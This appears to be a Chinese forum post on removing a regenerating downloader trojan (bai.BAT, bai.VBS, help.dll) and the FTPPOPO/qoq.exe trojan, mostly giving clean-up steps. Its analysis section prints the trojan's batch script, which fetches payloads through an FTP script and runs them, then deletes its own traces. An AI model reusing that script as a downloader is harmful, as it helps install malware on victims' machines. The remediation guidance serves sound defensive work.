感染的:木马程序 Trojan-Downloader.VBS.Agent.lg C:\WINDOWS\help\bai.VBS 926 字节
感染的:木马程序 Trojan.BAT.Runner.m C:\WINDOWS\help\bai.BAT 321 字节
一般来说非常顽固,感染后还会出来祸害。
一、分析:
把bai.bat文件改成TXT后缀 看了里面东西 写的是
del cc.exe
ftp.exe -s:C:\WINDOWS\help\help.dll
if not exist cc.exe sfd -s:C:\WINDOWS\help\help.dll
if not exist cc.exe sft -s:C:\WINDOWS\help\help.dll
cc.exe
cc.exe
cc1.exe
cc1.exe
if not exist cc.exe C:\WINDOWS\help\bai.VBS
:end
del C:\WINDOWS\help\help.dll
del C:\WINDOWS\help\bai.BAT
exit
打开 help.dll 看看里面有一段代码 open 一个ip地址 很明显 从这里下载的bai.vbs 以及bai.bat 2个文件 一个是批处理文件 一个是数据库文件 来支持批处理文件。
二、 处理方法
方法1:
这个木马最讨厌的地方在于,杀掉还会再生。木马原始文件好像还没有人找到。但是可以使用免疫的方法废掉它的武功。
病毒文件在windows/help文件夹里生成bai.batbai.vbshelp.dll(或许文件名称会有不同)请用记事本打开这些文件,讲里面的东西删光,再保存。或者删除文件再用记事本新建同名同扩展名的空文件。然后文件属性改成只读。OK!这样它再也不能发作了。
这招基本对所有会再生的病毒和木马都有效!~
大家中的不一样,所以文件名不同是正常的,这几个文件的作用就是从指定网站下载大量病毒和木马。很多新病毒木马都是用的这样的方法,不过文件和存放位置不同,大家要仔细找找,*.bat这个文件是判断你的机子里有没有他们的病毒,没有就调用help.dll和ftp从help.dll指定的网站下载主要的病毒体。自己要找到这几个文件,做成空文件代替,用360检查还有,但是那已经是你做的空文件了,没有任何危害你的能力了。
这几个文件通常会在c盘根目录下,windows下windows/help下和system32下,自己好好找找,help.dll和*.vbs可以用记事本打开,*.bat可以直接右键编辑,里面的内容字要懂点英文很容易看懂。
方法2:
FTPPOPO木马,大家我相信很熟悉(汗``)主要症状就是:进程中有qoq.exe文件(注意,qoq才是FTPPOPO木马的最终祸首),并且FTPPOPO木马删除掉还会有,玩游戏超级卡,时间被改回2001年7月15或者还有别的时间,解决办法:第一步:进入安全模式,在安全模式下打开系统C盘,在C:\\WINDOWS\\system32目录下发现一个qoq.exe文件(一定要仔细找),同时搜索到在System32\\wbem目录下的SAChost.exe文件(有的电脑可能没有,没有最好拉),删除这两个文件。 第二步:删除系统临时文件(别告诉我你不会),断开网络,重启电脑,并且进入正常模式在C:\\WINDOWS\\system32目录创建一个qoq.exe相同的应用程序(只需要建立一个新文件夹,改名为:qoq.exe),属性改为只读,在C:\\WINDOWS\\system32\\wbem目录下创建一个SAChost.exe文件(同上)属性改为只读,打开注册表,找到qoq.exe所在项和值然后删除(打开注册表方法:开始-运行-regedit,点查找 ,打上qoq.exe),最后一步,打开360安全卫士,清理恶评插件,清除FTPPOPO木马,然后用杀毒软件全盘杀毒,杀完重启,看一下是不是没有QOQ进程和FTPPOPO木马了``那你就成功拉呵呵。
对了还有重要一步,竟然忘记了,在进行我所说的方法同时,你们在安全模式下检查c:windows/help有bai.bat bai.vbs和help.dll,3个文件没有,如果有,就删除,此文件是隐藏文件,查看前请先设置文件夹显示全部内容。
方法3:
我之前也深受其扰,现在好几天了都没复发过.大家可以试试网络猪屁的办法。先把360和卡巴都升级到最新.然后断开网络连接(重要)杀恶意插件木马和病毒.都处理以后到windows/help文件夹建立三个空文件夹
分别命名为bai.bat bai.vbs和help.dll。
然后利用IP策略把机器的135,139这些容易被病毒入侵的端口关闭。
1、单击“开始”——“运行”,输入“dcomcnfg”,单击“确定”,打开组件服务。
2、在弹出的“组件服务”对话框中,选择“计算机”选项。
3、在“计算机”选项右边,右键单击“我的电脑”,选择“属性”。
4、在出现的“我的电脑属性”对话框“默认属性”选项卡中,去掉“在此计算机上启用分布式COM”前的勾。
5、选择“默认协议”选项卡,选中“面向连接的TCP/IP”,单击“删除”按钮。
6、单击“确定”按钮,设置完成,重新启动后即可关闭135端口。
